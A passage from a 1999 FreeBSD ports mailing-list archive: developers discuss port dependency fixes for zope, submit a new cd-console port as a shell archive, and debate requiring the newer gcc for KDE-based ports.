.:/usr/local/lib/fonts/{pk118:pk240:pk300:pk360:pk400:pk600}:{$TEXMF +/fonts:$VARTEXFONTS}//pk/{$MAKETEX_MODE:modeless}// +VFFONTS = .:{/usr/local/share/fonts/makejvf:$TEXMF/fonts}//vf// +TFMFONTS = .:{/usr/local/share/fonts/makejvf:$TEXMF/fonts:$VARTEXFONTS}//tfm// +****************************************************************************** diff -ruN dvipsk-vflib.orig/pkg/PLIST dvipsk-vflib/pkg/PLIST --- dvipsk-vflib.orig/pkg/PLIST Sun Oct 24 21:06:42 1999 +++ dvipsk-vflib/pkg/PLIST Mon Nov 29 04:13:19 1999 @@ -120,4 +120,3 @@ @dirrm share/texmf/tex/latex209/dvips @dirrm share/texmf/tex/latex209 @dirrm share/doc/dvips -@unexec if [ -f %D/share/texmf/web2c/texmf.cnf.bak ] ; then rm -f %D/share/texmf/web2c/texmf.cnf ; mv %D/share/texmf/web2c/texmf.cnf.bak %D/share/texmf/web2c/texmf.cnf ; fi >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Nov 28 14:18:58 1999 Delivered-To: freebsd-ports@freebsd.org Received: from jade.chc-chimes.com (jade.chc-chimes.com [216.28.46.6]) by hub.freebsd.org (Postfix) with ESMTP id 985E614A24 for ; Sun, 28 Nov 1999 14:18:54 -0800 (PST) (envelope-from billf@chc-chimes.com) Received: by jade.chc-chimes.com (Postfix, from userid 1001) id 73D431C2B; Sun, 28 Nov 1999 16:20:02 -0500 (EST) Received: from localhost (localhost [127.0.0.1]) by jade.chc-chimes.com (Postfix) with ESMTP id 6339C3843; Sun, 28 Nov 1999 16:20:02 -0500 (EST) Date: Sun, 28 Nov 1999 16:20:02 -0500 (EST) From: Bill Fumerola To: David Kirchner Cc: ports@FreeBSD.ORG Subject: Re: Buggy dependencies - zope In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, 28 Nov 1999, David Kirchner wrote: > The zope port depends on Apache + SSL, which I had installed, but it was > installed through the apache+modphp3 port, so zope decided it was cool to > go ahead and install the apache+modssl port, without php3 support. I'd > suggest changing the dependency to the apache binary, instead of the > installed port. RUN_DEPENDS= apache:${PORTSDIR}/www/apache13-modssl It does depend on the apache binary, however you might not have the apache binary in your $PATH. (I don't either) Since the port has no maintainer, does anyone object to the following patch? -- - bill fumerola - billf@chc-chimes.com - BF1560 - computer horizons corp - - ph:(800) 252-2421 - bfumerol@computerhorizons.com - billf@FreeBSD.org - Index: Makefile =================================================================== RCS file: /home/ncvs/ports/www/zope/Makefile,v retrieving revision 1.1.1.1 diff -u -r1.1.1.1 Makefile --- Makefile 1999/11/01 02:40:07 1.1.1.1 +++ Makefile 1999/11/28 22:14:11 @@ -14,7 +14,7 @@ MAINTAINER= ports@FreeBSD.ORG BUILD_DEPENDS= python1.5:${PORTSDIR}/lang/python -RUN_DEPENDS= apache:${PORTSDIR}/www/apache13-modssl +RUN_DEPENDS= ${PREFIX}/sbin/apache:${PORTSDIR}/www/apache13-modssl # Build has to be done in the final location after installing the sources # there. It were a major action to fix all paths otherwise. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Nov 28 14:24:21 1999 Delivered-To: freebsd-ports@freebsd.org Received: from web2.sea.nwserv.com (web2.sea.nwserv.com [216.145.16.2]) by hub.freebsd.org (Postfix) with ESMTP id 36A821537E for ; Sun, 28 Nov 1999 14:24:14 -0800 (PST) (envelope-from dpk@nwserv.com) Received: from localhost (dpk@localhost) by web2.sea.nwserv.com (8.9.3/8.9.3) with ESMTP id OAA23335; Sun, 28 Nov 1999 14:24:04 -0800 (PST) (envelope-from dpk@nwserv.com) Date: Sun, 28 Nov 1999 14:24:03 -0800 (PST) From: David Kirchner X-Sender: dpk@web2.sea.nwserv.com To: Bill Fumerola Cc: ports@FreeBSD.ORG Subject: Re: Buggy dependencies - zope In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Ah, I forgot that ports was a mailing list and not just a forwarder. Yeah, it was the PATH thing. -- David Kirchner, dpk@nwserv.com Northwest Web Services, Kirkland Washington 1-877-5-NWSERV - http://www.nwserv.com/ On Sun, 28 Nov 1999, Bill Fumerola wrote: > On Sun, 28 Nov 1999, David Kirchner wrote: > > > The zope port depends on Apache + SSL, which I had installed, but it was > > installed through the apache+modphp3 port, so zope decided it was cool to > > go ahead and install the apache+modssl port, without php3 support. I'd > > suggest changing the dependency to the apache binary, instead of the > > installed port. > > RUN_DEPENDS= apache:${PORTSDIR}/www/apache13-modssl > > It does depend on the apache binary, however you might not > have the apache binary in your $PATH. (I don't either) > > Since the port has no maintainer, does anyone object to the > following patch? > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Nov 28 14:36: 2 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 8E1CB1535E; Sun, 28 Nov 1999 14:36:01 -0800 (PST) (envelope-from billf@FreeBSD.org) Received: (from billf@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id OAA66186; Sun, 28 Nov 1999 14:36:01 -0800 (PST) (envelope-from billf@FreeBSD.org) Date: Sun, 28 Nov 1999 14:36:01 -0800 (PST) From: Message-Id: <199911282236.OAA66186@freefall.freebsd.org> To: tkato@prontomail.ne.jp, billf@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/14982: Update port: www/zope Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Update port: www/zope State-Changed-From-To: open->closed State-Changed-By: billf State-Changed-When: Sun Nov 28 14:35:42 PST 1999 State-Changed-Why: Updated, thanks. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Nov 28 15:50:26 1999 Delivered-To: freebsd-ports@freebsd.org Received: from 24-25-220-29.san.rr.com (24-25-220-29.san.rr.com [24.25.220.29]) by hub.freebsd.org (Postfix) with ESMTP id D8D0815176 for ; Sun, 28 Nov 1999 15:50:24 -0800 (PST) (envelope-from Doug@gorean.org) Received: from gorean.org (doug@master [10.0.0.2]) by 24-25-220-29.san.rr.com (8.9.3/8.8.8) with ESMTP id PAA20867; Sun, 28 Nov 1999 15:50:10 -0800 (PST) (envelope-from Doug@gorean.org) Message-ID: <3841BFB2.8C9348D9@gorean.org> Date: Sun, 28 Nov 1999 15:50:10 -0800 From: Doug Barton Organization: Triborough Bridge & Tunnel Authority X-Mailer: Mozilla 4.7 [en] (X11; U; FreeBSD 4.0-CURRENT-0927 i386) X-Accept-Language: en MIME-Version: 1.0 To: Ariel Burbaickij Cc: freebsd-ports@FreeBSD.ORG Subject: Re: dare to repost References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Ariel Burbaickij wrote: > > I posted this message already but it come out that i wa not in the list. > Well ,once more what are the policies accepted int th list. > Some DO and DONTS and I probably most important:Will the questions > related to troubles using ports be tolerated? This list is more for the discussion of ports creation, updates, policies, etc. In general, you can try freebsd-questions for information on how to use the ports, but don't be surprised if no one has an answer for you, as we cannot possibly support all of the thousands of different pieces of software in our ports collection. Good luck, Doug -- "Welcome to the desert of the real." - Laurence Fishburne as Morpheus, "The Matrix" To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Nov 28 17:50: 4 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 1484114C96 for ; Sun, 28 Nov 1999 17:50:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id RAA82278; Sun, 28 Nov 1999 17:50:00 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from network.dreaming.org (dreaming2.dreaming.org [209.146.217.2]) by hub.freebsd.org (Postfix) with ESMTP id 929DB14A1E for ; Sun, 28 Nov 1999 17:40:54 -0800 (PST) (envelope-from julian@network.dreaming.org) Received: (from julian@localhost) by network.dreaming.org (8.9.3/8.9.3) id UAA29256; Sun, 28 Nov 1999 20:40:53 -0500 (EST) (envelope-from julian) Message-Id: <199911290140.UAA29256@network.dreaming.org> Date: Sun, 28 Nov 1999 20:40:53 -0500 (EST) From: julian@dreaming.org Reply-To: jdunn@aquezada.com To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15152: new port cd-console Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15152 >Category: ports >Synopsis: new port cd-console >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Sun Nov 28 17:50:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: Julian C. Dunn >Release: FreeBSD 3.3-STABLE i386 >Organization: The Dreaming Network >Environment: >Description: >How-To-Repeat: >Fix: # This is a shell archive. Save it in a file, remove anything before # this line, and then unpack it by entering "sh file". Note, it may # create directories; files and directories will be owned by you and # have default permissions. # # This archive contains: # # cd-console/ # cd-console/Makefile # cd-console/pkg # cd-console/pkg/COMMENT # cd-console/pkg/DESCR # cd-console/pkg/PLIST # cd-console/files # cd-console/files/md5 # cd-console/patches # cd-console/patches/patch-aa # cd-console/patches/patch-ab # echo c - cd-console/ mkdir -p cd-console/ > /dev/null 2>&1 echo x - cd-console/Makefile sed 's/^X//' >cd-console/Makefile << 'END-of-cd-console/Makefile' X# New ports collection makefile for: cd-console X# Version required: 2.1 X# Date created: Sun Nov 28 19:55:19 EST 1999 X# Whom: jdunn@aquezada.com X# X# $FreeBSD$ X# X XDISTNAME= cd-console-2.3 XCATEGORIES= audio XMASTER_SITES= http://www.cs.helsinki.fi/~salerma/cd-console/ \ X ftp://ftp.aquezada.com/pub/cd-console/ X XMAINTAINER= jdunn@aquezada.com X X.include END-of-cd-console/Makefile echo c - cd-console/pkg mkdir -p cd-console/pkg > /dev/null 2>&1 echo x - cd-console/pkg/COMMENT sed 's/^X//' >cd-console/pkg/COMMENT << 'END-of-cd-console/pkg/COMMENT' XA curses-based console CD player END-of-cd-console/pkg/COMMENT echo x - cd-console/pkg/DESCR sed 's/^X//' >cd-console/pkg/DESCR << 'END-of-cd-console/pkg/DESCR' XA curses-based console CD player, with two viewing modes, Xone suitable for a 7x41 xterm. X XWWW: http://www.cs.helsinki.fi/~salerma/cd-console/ XAuthor: Osku Salerma, osku@iki.fi X X- Julian Xjdunn@aquezada.com END-of-cd-console/pkg/DESCR echo x - cd-console/pkg/PLIST sed 's/^X//' >cd-console/pkg/PLIST << 'END-of-cd-console/pkg/PLIST' Xbin/cd-console END-of-cd-console/pkg/PLIST echo c - cd-console/files mkdir -p cd-console/files > /dev/null 2>&1 echo x - cd-console/files/md5 sed 's/^X//' >cd-console/files/md5 << 'END-of-cd-console/files/md5' XMD5 (cd-console-2.3.tar.gz) = b5b9b75b8dbb89a970cdc380e4cc54ec END-of-cd-console/files/md5 echo c - cd-console/patches mkdir -p cd-console/patches > /dev/null 2>&1 echo x - cd-console/patches/patch-aa sed 's/^X//' >cd-console/patches/patch-aa << 'END-of-cd-console/patches/patch-aa' X--- Makefile.orig Sun Nov 28 20:08:56 1999 X+++ Makefile Sun Nov 28 20:14:20 1999 X@@ -5,17 +5,17 @@ X # very welcome). X X # for linux X-DEFS = -DOS_LINUX X-EXTRA_OBJS = cd_ll_linux.o X+#DEFS = -DOS_LINUX X+#EXTRA_OBJS = cd_ll_linux.o X X # for bsd. only tested on freebsd X-#DEFS = -DOS_BSD X-#EXTRA_OBJS = cd_ll_bsd.o X- X+DEFS = -DOS_BSD X+EXTRA_OBJS = cd_ll_bsd.o X+CDDEVICE=\"/dev/acd0c\" X X # you shouldn't have to change anything below this line X X- X+BINPATH=${PREFIX}/bin/ X OBJS=cd-console.o cd.o $(EXTRA_OBJS) X LIBS = -lncurses X X@@ -38,10 +38,13 @@ X $(CC) -c cd_ll_linux.cpp $(CFLAGS) X X cd_ll_bsd.o: cd_ll.h cd_ll_bsd.h cd_ll_bsd.cpp X- $(CC) -c cd_ll_bsd.cpp $(CFLAGS) X+ $(CC) -c -DDEVICE=$(CDDEVICE) cd_ll_bsd.cpp $(CFLAGS) X X cd.o: cd.h cd.cpp X $(CC) -c cd.cpp $(CFLAGS) X X clean: X rm -f $(OBJS) cd-console X+ X+install: X+ @$(BSD_INSTALL_PROGRAM) cd-console $(BINPATH) END-of-cd-console/patches/patch-aa echo x - cd-console/patches/patch-ab sed 's/^X//' >cd-console/patches/patch-ab << 'END-of-cd-console/patches/patch-ab' X--- cd_ll_bsd.cpp.orig Sun Nov 28 20:14:31 1999 X+++ cd_ll_bsd.cpp Sun Nov 28 20:15:29 1999 X@@ -10,7 +10,9 @@ X #include "cd_ll_bsd.h" X X // the cd-rom device file X+#ifndef DEVICE X #define DEVICE "/dev/acd0c" X+#endif X X cd_ll_bsd::cd_ll_bsd() X : m_fd(-1) END-of-cd-console/patches/patch-ab exit >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Nov 28 18: 0: 3 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 3776C14EAF for ; Sun, 28 Nov 1999 18:00:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id SAA82911; Sun, 28 Nov 1999 18:00:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Sun, 28 Nov 1999 18:00:02 -0800 (PST) Message-Id: <199911290200.SAA82911@freefall.freebsd.org> To: freebsd-ports@FreeBSD.org Cc: From: Will Andrews Subject: Re: ports/15132: new port: games/krubik Reply-To: Will Andrews Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR ports/15132; it has been noted by GNATS. From: Will Andrews To: "Chris D. Faulhaber" Cc: FreeBSD-gnats-submit@FreeBSD.ORG Subject: Re: ports/15132: new port: games/krubik Date: Sun, 28 Nov 1999 20:52:15 -0500 (EST) On 28-Nov-99 Chris D. Faulhaber wrote: > My krubik port that was committed Friday isn't good enough for you? :) Err, forgive me.. I "caught up" on 2,300 emails on Saturday. I must have missed that commit. ;-) That's what I get for being on cvs-all, -current, -ports, -stable, -doc, and a bucketload of others, and leaving for a week. ;-) Apologies again. KRubik's a great game, ain't it? :-) -- Will Andrews GCS/E/S @d- s+:+>+:- a--->+++ C++ UB++++ P+ L- E--- W+++ !N !o ?K w--- ?O M+ V-- PS+ PE++ Y+ PGP+>+++ t++ 5 X++ R+ tv+ b++>++++ DI+++ D+ G++>+++ e->++++ h! r-->+++ y? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Nov 28 18: 0: 7 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 1B4F714EC9 for ; Sun, 28 Nov 1999 18:00:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id SAA82918; Sun, 28 Nov 1999 18:00:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Sun, 28 Nov 1999 18:00:03 -0800 (PST) Message-Id: <199911290200.SAA82918@freefall.freebsd.org> To: freebsd-ports@FreeBSD.org Cc: From: Will Andrews Subject: Re: ports/15135: new port: devel/cervisia Reply-To: Will Andrews Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR ports/15135; it has been noted by GNATS. From: Will Andrews To: "Chris D. Faulhaber" Cc: FreeBSD-gnats-submit@FreeBSD.ORG Subject: Re: ports/15135: new port: devel/cervisia Date: Sun, 28 Nov 1999 20:59:16 -0500 (EST) On 28-Nov-99 Chris D. Faulhaber wrote: > Under -stable: > > ===> Building for cervisia-0.2.1 > make all-recursive > Making all in src > c++ -DHAVE_CONFIG_H -I. -I. -I.. -I/usr/local/include > -I/usr/X11R6/include/X11/qt -I/usr/local/include -I/usr/X11R6/include > -O1 -g -c main.cpp > /usr/X11R6/bin/moc toplevel.h -o toplevel.moc > c++ -DHAVE_CONFIG_H -I. -I. -I.. -I/usr/local/include > -I/usr/X11R6/include/X11/qt -I/usr/local/include -I/usr/X11R6/include > -O1 -g -c toplevel.cpp > /usr/X11R6/include/X11/qt/qlist.h: In method `void > QListT::deleteItem(void *)': > In file included from logdlg.h:26, > from toplevel.cpp:32: > /usr/X11R6/include/X11/qt/qlist.h:177: invalid use of undefined type > `struct LogTreeItem' > /usr/X11R6/include/X11/qt/qlist.h: In method `void > QListT::deleteItem(void *)': > In file included from diffdlg.h:26, > from toplevel.cpp:34: > /usr/X11R6/include/X11/qt/qlist.h:177: invalid use of undefined type > `struct DiffViewItem' > /usr/X11R6/include/X11/qt/qlist.h: In method `void > QListT::deleteItem(void *)': > In file included from toplevel.cpp:35: > /usr/X11R6/include/X11/qt/qlist.h:177: invalid use of undefined type > `struct ResolveItem' > /usr/X11R6/include/X11/qt/qlist.h: In method `void > QListT::deleteItem(void *)': > In file included from annotatedlg.h:23, > from toplevel.cpp:36: > /usr/X11R6/include/X11/qt/qlist.h:177: invalid use of undefined type > `struct AnnotateViewItem' > *** Error code 1 > > This is another KDE/C++ port that will require the new gcc; and since it > is c++, the kde libs will need to be created with the new gcc also (which > doesn't happen in anything but -current). > > Can we make ports like this -current-only? I think, quite frankly, that it is time for people who wish to use KDE to start using the new gcc (and I mean permanently).. 3.x's compiler is out of date. ;-) However, such a solution can be adopted for the time being, or we can move forward and add "USE_NEWGCC" to the kdelibs11 and qt142 ports (my kdevelop port, I found, requires Qt 1.42 to be compiled using NEWGCC under -STABLE). gcc 2.7.2.3 is rapidly becoming obsolete. Thankfully, we have gcc 2.95.2 in -CURRENT before Jordan's "feature freeze". ;-) Perhaps I should be testing all future KDE ports I make using both the old version of KDE libraries and Qt 1.42, and their newgcc'd counterparts, to make sure I stay in sync with the rapidly-becoming-obsolete kdelibs11/qt142 ports. Currently, my -STABLE machine has newgcc'd of both. Thanks for alerting me to cervisia's kdelibs/qt-newgcc requirement. Did I say "obsolete" or "out of date" too many times here? :-) -- Will Andrews GCS/E/S @d- s+:+>+:- a--->+++ C++ UB++++ P+ L- E--- W+++ !N !o ?K w--- ?O M+ V-- PS+ PE++ Y+ PGP+>+++ t++ 5 X++ R+ tv+ b++>++++ DI+++ D+ G++>+++ e->++++ h! r-->+++ y? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Nov 28 18: 6:22 1999 Delivered-To: freebsd-ports@freebsd.org Received: from pawn.primelocation.net (pawn.primelocation.net [205.161.238.235]) by hub.freebsd.org (Postfix) with ESMTP id DED3614EC9 for ; Sun, 28 Nov 1999 18:06:20 -0800 (PST) (envelope-from cdf.lists@fxp.org) Received: by pawn.primelocation.net (Postfix, from userid 1016) id C47E69B38; Sun, 28 Nov 1999 21:06:19 -0500 (EST) Received: from localhost (localhost [127.0.0.1]) by pawn.primelocation.net (Postfix) with ESMTP id B41A6BA21; Sun, 28 Nov 1999 21:06:19 -0500 (EST) Date: Sun, 28 Nov 1999 21:06:19 -0500 (EST) From: "Chris D. Faulhaber" X-Sender: cdf.lists@pawn.primelocation.net To: Will Andrews Cc: freebsd-ports@FreeBSD.org Subject: Re: ports/15135: new port: devel/cervisia In-Reply-To: <199911290200.SAA82918@freefall.freebsd.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, 28 Nov 1999, Will Andrews wrote: > I think, quite frankly, that it is time for people who wish to use KDE to start > using the new gcc (and I mean permanently).. 3.x's compiler is out of date. ;-) > > However, such a solution can be adopted for the time being, or we can move > forward and add "USE_NEWGCC" to the kdelibs11 and qt142 ports (my kdevelop > port, I found, requires Qt 1.42 to be compiled using NEWGCC under -STABLE). > > gcc 2.7.2.3 is rapidly becoming obsolete. Thankfully, we have gcc 2.95.2 in > -CURRENT before Jordan's "feature freeze". ;-) > > Perhaps I should be testing all future KDE ports I make using both the old > version of KDE libraries and Qt 1.42, and their newgcc'd counterparts, to make > sure I stay in sync with the rapidly-becoming-obsolete kdelibs11/qt142 ports. > Currently, my -STABLE machine has newgcc'd of both. > > Thanks for alerting me to cervisia's kdelibs/qt-newgcc requirement. Did I say > "obsolete" or "out of date" too many times here? :-) > I considered porting it a while ago but hesitated due to the aforementioned problems. I agree that kde should be using 2.95.2 throughout; however, as I stated a while back, a lot of people are not gonna be happy with recompiling their libs to use use new applications. And I still pose the question, is it okay to port an application requiring the new gcc and marking as broken for < -current until the qt/kde apps require the new gcc and/or mainstream release uses it. ----- Chris D. Faulhaber | All the true gurus I've met never System/Network Administrator, | claimed they were one, and always Reality Check Information, Inc. | pointed to someone better. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Nov 28 18:10: 4 1999 Delivered-To: freebsd-ports@freebsd.org Received: from norn.ca.eu.org (cr965240-b.abtsfd1.bc.wave.home.com [24.113.19.137]) by hub.freebsd.org (Postfix) with ESMTP id 9025114D8D for ; Sun, 28 Nov 1999 18:10:01 -0800 (PST) (envelope-from cpiazza@norn.ca.eu.org) Received: by norn.ca.eu.org (Postfix, from userid 1000) id 4518D1D6; Sun, 28 Nov 1999 18:10:00 -0800 (PST) Date: Sun, 28 Nov 1999 18:10:00 -0800 From: Chris Piazza To: "Chris D. Faulhaber" Cc: Will Andrews , freebsd-ports@FreeBSD.ORG Subject: Re: ports/15135: new port: devel/cervisia Message-ID: <19991128181000.A16943@norn.ca.eu.org> References: <199911290200.SAA82918@freefall.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: ; from jedgar@fxp.org on Sun, Nov 28, 1999 at 09:06:19PM -0500 X-Operating-System: FreeBSD 4.0-CURRENT i386 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, Nov 28, 1999 at 09:06:19PM -0500, Chris D. Faulhaber wrote: > On Sun, 28 Nov 1999, Will Andrews wrote: > > I considered porting it a while ago but hesitated due to the > aforementioned problems. I agree that kde should be using 2.95.2 > throughout; however, as I stated a while back, a lot of people are not > gonna be happy with recompiling their libs to use use new applications. > > And I still pose the question, is it okay to port an application > requiring the new gcc and marking as broken for < -current until the > qt/kde apps require the new gcc and/or mainstream release uses it. I'd say it's fine. I did this with my port of FINE until they added support for qt2. -Chris -- cpiazza@jaxon.net cpiazza@FreeBSD.org Abbotsford, BC, Canada To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Nov 28 18:11: 5 1999 Delivered-To: freebsd-ports@freebsd.org Received: from jade.chc-chimes.com (jade.chc-chimes.com [216.28.46.6]) by hub.freebsd.org (Postfix) with ESMTP id 183E314A10 for ; Sun, 28 Nov 1999 18:11:03 -0800 (PST) (envelope-from billf@chc-chimes.com) Received: by jade.chc-chimes.com (Postfix, from userid 1001) id 0C3861C2B; Sun, 28 Nov 1999 20:12:11 -0500 (EST) Received: from localhost (localhost [127.0.0.1]) by jade.chc-chimes.com (Postfix) with ESMTP id 07D5D3843; Sun, 28 Nov 1999 20:12:11 -0500 (EST) Date: Sun, 28 Nov 1999 20:12:11 -0500 (EST) From: Bill Fumerola To: "Chris D. Faulhaber" Cc: Will Andrews , freebsd-ports@FreeBSD.org Subject: Re: ports/15135: new port: devel/cervisia In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, 28 Nov 1999, Chris D. Faulhaber wrote: > And I still pose the question, is it okay to port an application > requiring the new gcc and marking as broken for < -current until the > qt/kde apps require the new gcc and/or mainstream release uses it. USE_NEWGCC= yes -- - bill fumerola - billf@chc-chimes.com - BF1560 - computer horizons corp - - ph:(800) 252-2421 - bfumerol@computerhorizons.com - billf@FreeBSD.org - To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Nov 28 18:12: 9 1999 Delivered-To: freebsd-ports@freebsd.org Received: from pawn.primelocation.net (pawn.primelocation.net [205.161.238.235]) by hub.freebsd.org (Postfix) with ESMTP id A88AF14A10 for ; Sun, 28 Nov 1999 18:12:07 -0800 (PST) (envelope-from jedgar@fxp.org) Received: by pawn.primelocation.net (Postfix, from userid 1003) id C6D109B38; Sun, 28 Nov 1999 21:12:06 -0500 (EST) Received: from localhost (localhost [127.0.0.1]) by pawn.primelocation.net (Postfix) with ESMTP id BEDC6BA21; Sun, 28 Nov 1999 21:12:06 -0500 (EST) Date: Sun, 28 Nov 1999 21:12:06 -0500 (EST) From: "Chris D. Faulhaber" X-Sender: jedgar@pawn.primelocation.net To: Bill Fumerola Cc: Will Andrews , freebsd-ports@FreeBSD.org Subject: Re: ports/15135: new port: devel/cervisia In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, 28 Nov 1999, Bill Fumerola wrote: > On Sun, 28 Nov 1999, Chris D. Faulhaber wrote: > > > And I still pose the question, is it okay to port an application > > requiring the new gcc and marking as broken for < -current until the > > qt/kde apps require the new gcc and/or mainstream release uses it. > > USE_NEWGCC= yes > But the app will not link if the kde libs are compiled with the old g++ (2.7.2.3) ----- Chris D. Faulhaber | You can ISO9001 certify the process of System/Network Administrator, | shooting yourself in the foot, so long Reality Check Information, Inc. | as the process is documented and reliably | produces the proper result. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Nov 28 18:13: 8 1999 Delivered-To: freebsd-ports@freebsd.org Received: from jade.chc-chimes.com (jade.chc-chimes.com [216.28.46.6]) by hub.freebsd.org (Postfix) with ESMTP id B3C3A14A10 for ; Sun, 28 Nov 1999 18:13:07 -0800 (PST) (envelope-from billf@chc-chimes.com) Received: by jade.chc-chimes.com (Postfix, from userid 1001) id 558A31C2B; Sun, 28 Nov 1999 20:14:15 -0500 (EST) Received: from localhost (localhost [127.0.0.1]) by jade.chc-chimes.com (Postfix) with ESMTP id 4FD753843; Sun, 28 Nov 1999 20:14:15 -0500 (EST) Date: Sun, 28 Nov 1999 20:14:15 -0500 (EST) From: Bill Fumerola To: "Chris D. Faulhaber" Cc: Will Andrews , freebsd-ports@FreeBSD.org Subject: Re: ports/15135: new port: devel/cervisia In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, 28 Nov 1999, Chris D. Faulhaber wrote: > > USE_NEWGCC= yes > > But the app will not link if the kde libs are compiled with the old g++ > (2.7.2.3) Grumble. -- - bill fumerola - billf@chc-chimes.com - BF1560 - computer horizons corp - - ph:(800) 252-2421 - bfumerol@computerhorizons.com - billf@FreeBSD.org - To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Nov 28 18:19: 9 1999 Delivered-To: freebsd-ports@freebsd.org Received: from viper.lovett.com (viper.lovett.com [216.60.121.173]) by hub.freebsd.org (Postfix) with ESMTP id A421D14A10 for ; Sun, 28 Nov 1999 18:19:05 -0800 (PST) (envelope-from ade@lovett.com) Received: from ade by viper.lovett.com with local (Exim 3.03 #1) id 11sGOw-000G1R-00; Sun, 28 Nov 1999 20:18:50 -0600 Date: Sun, 28 Nov 1999 20:18:50 -0600 From: Ade Lovett To: "Chris D. Faulhaber" Cc: Bill Fumerola , Will Andrews , freebsd-ports@FreeBSD.org Subject: Re: ports/15135: new port: devel/cervisia Message-ID: <19991128201850.A61560@lovett.com> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: ; from jedgar@fxp.org on Sun, Nov 28, 1999 at 09:12:06PM -0500 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, Nov 28, 1999 at 09:12:06PM -0500, Chris D. Faulhaber wrote: > On Sun, 28 Nov 1999, Bill Fumerola wrote: > > > On Sun, 28 Nov 1999, Chris D. Faulhaber wrote: > > > > > And I still pose the question, is it okay to port an application > > 